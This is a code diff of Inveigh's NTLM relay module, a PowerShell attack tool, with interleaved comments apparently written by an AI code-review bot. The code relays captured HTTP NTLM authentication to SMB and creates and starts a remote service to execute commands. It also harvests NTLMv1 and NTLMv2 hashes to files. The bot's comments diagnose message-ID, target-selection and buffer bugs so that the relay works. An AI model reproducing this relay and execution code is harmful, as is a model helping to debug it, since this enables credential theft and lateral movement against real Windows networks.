$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
$packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
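Review bot: The ReadRequest now asks for a fixed `0xff` (255) bytes and drops the explicit `CreditCharge`, so any RPC response on the pipe larger than 255 bytes is left unread and would be picked up by the next read as a stale payload; the receive buffers in this file are 1024 bytes, so a value matching them looks safe under a single credit, though that should be confirmed against MS-SMB2 rather than assumed. Whether the SCM responses parsed below ever exceed 255 bytes is not visible in this diff, so at minimum state the assumption: `# read length sized for the SCM responses parsed in the following stages`. The stage switch enclosing this block starts before the hunk and continues after it.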
@@ -2355,8 +2400,8 @@ $SMB_relay_functions_scriptblock =
'OpenSCManagerW'
{
- $SMB2_message_ID = 30
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SCM_data = New-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
@@ -2383,13 +2428,12 @@ $SMB_relay_functions_scriptblock =
$SMB_service_manager_context_handle = $SMB_client_receive[108..127]
$packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full has required privilege on $Target") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full has command execution privilege on $Target") > $null
if($Attack -eq 'Session')
{
$SMB_administrator = $true
$SMB_close_service_handle_stage = 2
- $SMB2_message_ID += 19
$SMB_client_stage = 'CloseServiceHandle'
}
elseif($SCM_data.Length -lt $SMB_split_index)
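Review bot: In the `$Attack -eq 'Session'` branch the old `$SMB2_message_ID += 19` was removed without a replacement, while the parallel failure path later in this stage (where the same `+= 19` became `$SMB2_message_ID++`) still advances the ID before jumping to `CloseServiceHandle`; with `$SMB_close_service_handle_stage = 2` the stage-1 increment inside `CloseServiceHandle` is skipped, so the close request in the Session path appears to go out with the message ID already used by the preceding read. Add `$SMB2_message_ID++` next to `$SMB_close_service_handle_stage = 2` in this branch, unless `CloseServiceHandle` increments unconditionally before its stage check, which is outside this diff. The enclosing stage block starts before the hunk and continues after it.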
@@ -2407,24 +2451,24 @@ $SMB_relay_functions_scriptblock =
if($HTTP_NTLM_domain_string -ne '')
{
- $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target")
+ $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") > $null
}
if(!$inveigh.relay_list.Contains("$HTTP_source_IP $Target"))
{
- $inveigh.relay_list.Add("$HTTP_source_IP $Target")
+ $inveigh.relay_list.Add("$HTTP_source_IP $Target") > $null
}
if($Attack -ne 'Session')
{
$SMB_relay_failed = $true
- $inveigh.relay_list.Add("0 $HTTP_source_IP $HTTP_username_full $Target")
+ $inveigh.relay_list.Add("0 $HTTP_source_IP $HTTP_username_full $Target") > $null
}
- $inveigh.output_queue.Add("[!] $(Get-Date -format s) $HTTP_username_full does not have required privilege on $Target") > $null
+ $inveigh.output_queue.Add("[!] $(Get-Date -format s) $HTTP_username_full does not have command execution privilege on $Target") > $null
$SMB_service_manager_context_handle = $SMB_client_receive[108..127]
$SMB_close_service_handle_stage = 2
- $SMB2_message_ID += 19
+ $SMB2_message_ID++
$SMB_client_stage = 'CloseServiceHandle'
}
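Review bot: The rewritten message on the failure path formats its timestamp as `[!] $(Get-Date -format s) ...` while every other message touched by this commit brackets it as `[!] [$(Get-Date -format s)] ...`, which matters if the output is filtered or parsed by tooling; it should be `$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full does not have command execution privilege on $Target") > $null`. The surrounding stage block starts before this hunk.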
else
@@ -2436,8 +2480,8 @@ $SMB_relay_functions_scriptblock =
'CreateServiceW'
{
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
$packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
@@ -2457,13 +2501,13 @@ $SMB_relay_functions_scriptblock =
'CreateServiceW_First'
{
$SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
- $SMB2_message_ID += 20
+ $SMB2_message_ID++
$SCM_data_first = $SCM_data[0..($SMB_split_index - 1)]
$packet_RPC_data = New-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first
$packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length)
$SMB_split_index_tracker = $SMB_split_index
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -2496,7 +2540,7 @@ $SMB_relay_functions_scriptblock =
$packet_RPC_data = New-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle
$packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index)
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -2525,7 +2569,7 @@ $SMB_relay_functions_scriptblock =
$SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length]
$packet_RPC_data = New-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -2548,8 +2592,8 @@ $SMB_relay_functions_scriptblock =
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service created on $Target") > $null
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Trying to execute command on $Target") > $null
$SMB_service_context_handle = $SMB_client_receive[112..131]
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SCM_data = New-PacketSCMStartServiceW $SMB_service_context_handle
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00
@@ -2569,7 +2613,7 @@ $SMB_relay_functions_scriptblock =
}
elseif([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '31-04-00-00')
{
- $inveigh.console_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service creation failed on $Target") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service creation failed on $Target") > $null
$SMB_relay_failed = $true
}
else
@@ -2591,8 +2635,8 @@ $SMB_relay_functions_scriptblock =
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service failed to start on $Target") > $null
}
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SCM_data = New-PacketSCMDeleteServiceW $SMB_service_context_handle
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00
@@ -2618,7 +2662,7 @@ $SMB_relay_functions_scriptblock =
if($SMB_close_service_handle_stage -eq 1)
{
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service deleted on $Target") > $null
- $SMB2_message_ID += 20
+ $SMB2_message_ID++
$SMB_close_service_handle_stage++
$packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_context_handle
}
@@ -2629,7 +2673,7 @@ $SMB_relay_functions_scriptblock =
$packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
}
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
@@ -2647,8 +2691,8 @@ $SMB_relay_functions_scriptblock =
'CloseRequest'
{
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2CloseRequest $SMB_file_ID
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -2663,8 +2707,8 @@ $SMB_relay_functions_scriptblock =
'TreeDisconnect'
{
- $SMB2_message_ID += 1
- $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2TreeDisconnectRequest
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -2689,8 +2733,8 @@ $SMB_relay_functions_scriptblock =
'Logoff'
{
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2SessionLogoffRequest
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -2818,6 +2862,7 @@ $HTTP_scriptblock =
$HTTP_running = $true
$HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint
$HTTP_client_close = $true
+ $process_ID_bytes = Get-ProcessIDArray
$relay_step = 0
if($proxy_listener)
@@ -2933,7 +2978,7 @@ $HTTP_scriptblock =
while($HTTP_stream.DataAvailable)
{
- $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
+ $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) > $null
}
$TCP_request = [System.BitConverter]::ToString($TCP_request_bytes)
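Review bot: The `> $null` added to the `Read` call discards the number of bytes actually read, so the `ToString` on the next line converts the whole of `$TCP_request_bytes`, including stale bytes beyond the latest read length whenever the buffer is reused (its allocation is outside the hunk, so this is inferred). Keeping the count costs nothing: `$TCP_request_length = $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)` and then `$TCP_request = [System.BitConverter]::ToString($TCP_request_bytes[0..($TCP_request_length - 1)])`, guarded for a zero-length read. The enclosing request loop starts and ends outside this hunk.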
@@ -2964,13 +3009,13 @@ $HTTP_scriptblock =
if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent") > $null
if($Proxy -eq 'Y' -and $ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") > $null
}
}
@@ -3024,39 +3069,44 @@ $HTTP_scriptblock =
if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
{
- if($attack -eq 'Session')
+ if($inveigh.target_list -gt 1)
{
- $target = $null
- ForEach($target_entry in $inveigh.target_list)
+ if($attack -eq 'Session')
{
+ $target = $null
- if(!$target)
+ ForEach($target_entry in $inveigh.target_list)
{
-
- if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Initiator -eq $HTTP_source_IP -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit)
+
+ if(!$target)
{
- $target = $target_entry
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target")
+
+ if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Initiator -eq $HTTP_source_IP -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit)
+ {
+ $target = $target_entry
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") > $null
+ }
+
}
}
- }
-
- if(!$target -and $SessionPriority -eq 'Y')
- {
-
- ForEach($target_entry in $inveigh.target_list)
+ if(!$target -and $SessionPriority -eq 'Y')
{
- if(!$target)
+ ForEach($target_entry in $inveigh.target_list)
{
-
- if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Privileged -eq 'yes' -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit)
+
+ if(!$target)
{
- $target = $target_entry
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target")
+
+ if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Privileged -eq 'yes' -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit)
+ {
+ $target = $target_entry
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") > $null
+ }
+
}
}
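Review bot: `if($inveigh.target_list -gt 1)` does not test the number of targets: with an array on the left, PowerShell's `-gt` acts as a filter and returns the elements that compare greater than `1`, and an IP-address or hostname string ordinarily sorts above `"1"`, so a single-entry list still yields a non-empty (truthy) result and the `else { $target = $inveigh.target_list[0] }` branch in the next hunk is never reached. The intended check is `if($inveigh.target_list.Count -gt 1)`, which also matches the `.Count`-based session-limit comparisons already used in this hunk. This may be part of why the commit message reports multitarget as still not working. The enclosing NTLM type-1 handling continues into the following hunk.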
@@ -3064,39 +3114,43 @@ $HTTP_scriptblock =
}
}
-
- }
- else
- {
- $target = $null
-
- ForEach($target_entry in $inveigh.target_list)
+ else
{
+ $target = $null
- if(!$target)
+ ForEach($target_entry in $inveigh.target_list)
{
- if($HTTP_source_IP -ne $target_entry -and !$inveigh.relay_list.Contains("$HTTP_source_IP $target_entry"))
+ if(!$target)
{
- $target = $target_entry
+
+ if($HTTP_source_IP -ne $target_entry -and !$inveigh.relay_list.Contains("$HTTP_source_IP $target_entry"))
+ {
+ $target = $target_entry
+ }
+
}
}
- }
+ if(!$target)
+ {
+ $target = $inveigh.target_list[(Get-Random -Maximum $inveigh.target_list.Count)]
+ }
- if(!$target)
- {
- $target = $inveigh.target_list[(Get-Random -Maximum $inveigh.target_list.Count)]
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") > $null
}
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target")
+ }
+ else
+ {
+ $target = $inveigh.target_list[0]
}
if($inveigh.SMB_relay -and $relay_step -eq 0 -and ($target -and $HTTP_source_IP -ne $target))
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay initiated by $HTTP_source_IP")
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Grabbing challenge for relay from $target")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay initiated by $HTTP_source_IP") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Grabbing challenge for relay from $target") > $null
$SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
$SMB_relay_socket.Client.ReceiveTimeout = 60000
$SMB_relay_socket.Connect($Target,"445")
@@ -3105,13 +3159,13 @@ $HTTP_scriptblock =
if(!$SMB_relay_socket.connected)
{
- $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Relay target is not responding")
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Relay target is not responding") > $null
$relay_step = 0
}
if($relay_step -eq 1)
{
- $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes $SMB_version
+ $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes $SMB_version $process_ID_bytes
if($SMB_relay_bytes.Length -le 3)
{
@@ -3155,9 +3209,9 @@ $HTTP_scriptblock =
$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
$NTLM = 'NTLM ' + $NTLM_challenge_base64
$NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes
- $inveigh.HTTP_challenge_queue.Add($HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge)
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Received challenge $NTLM_challenge for relay from $Target")
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Providing challenge $NTLM_challenge for relay to $HTTP_source_IP")
+ $inveigh.HTTP_challenge_queue.Add($HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge) > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Received challenge $NTLM_challenge for relay from $Target") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Providing challenge $NTLM_challenge for relay to $HTTP_source_IP") > $null
$relay_step = 2
}
else
@@ -3171,11 +3225,11 @@ $HTTP_scriptblock =
if(!$target)
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted due to lack of an eligible target")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted due to lack of an eligible target") > $null
}
elseif($HTTP_source_IP -ne $Target)
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted relay due to initiator matching $target")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted relay due to initiator matching $target") > $null
}
$NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
@@ -3194,7 +3248,7 @@ $HTTP_scriptblock =
if($HTTP_NTLM_domain_length -eq 0)
{
- $HTTP_NTLM_domain_string = ''
+ $HTTP_NTLM_domain_string = ""
}
else
{
@@ -3204,13 +3258,13 @@ $HTTP_scriptblock =
$HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes
$HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes
- if($HTTP_NTLM_user_length -gt 0)
+ if($HTTP_NTLM_user_length -eq 0)
{
- $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
+ $HTTP_NTLM_user_string = ""
}
else
{
- $HTTP_NTLM_user_string = ""
+ $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
}
$HTTP_username_full = $HTTP_NTLM_domain_string + "\" + $HTTP_NTLM_user_string
@@ -3227,21 +3281,21 @@ $HTTP_scriptblock =
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
- $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash)
+ $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) > $null
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null
}
else
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full - not unique")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")))
{
$inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash)
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response written to " + $inveigh.NTLMv1_out_file)
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response written to " + $inveigh.NTLMv1_out_file) > $null
}
if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")
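Review bot: `$inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash)` is left without the `> $null` that this commit adds to every other `.Add` in the block, so whatever `.Add` returns (the index, for an ArrayList) still leaks into the scriptblock's output stream, while the NTLMv2 counterpart two hunks down (`$inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash) > $null`) is fixed. Change it to `$inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash) > $null`. The same untouched form also appears in both NTLM hunks of Inveigh.ps1 (`$inveigh.NTLMv1_file_queue.Add` and `$inveigh.NTLMv2_file_queue.Add`).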
@@ -3261,26 +3315,26 @@ $HTTP_scriptblock =
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
- $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash)
+ $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) > $null
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null
}
else
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full - not unique")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")))
{
- $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash)
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+ $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash) > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) > $null
}
if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")
{
- $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_username_full")
+ $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_username_full") > $null
}
}
@@ -3306,8 +3360,8 @@ $HTTP_scriptblock =
if(($inveigh.session_list | Where-Object {$_.User -eq $HTTP_username_full -and $_.Target -eq $target -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit)
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sending $NTLM_type response for $HTTP_username_full for relay to $Target")
- $SMB_relay_failed = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sending $NTLM_type response for $HTTP_username_full for relay to $Target") > $null
+ $SMB_relay_failed = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID $process_ID_bytes
if(!$SMB_relay_failed)
{
@@ -3318,7 +3372,7 @@ $HTTP_scriptblock =
$inveigh.session_table[$inveigh.session_count] = $SMB_session_ID
$inveigh.session_message_ID_table[$inveigh.session_count] = 3
$inveigh.session_lock_table[$inveigh.session_count] = 'open'
- $session_privilege = SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID
+ $session_privilege = SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID $process_ID_bytes
$session_object = New-Object PSObject
Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $inveigh.session_count
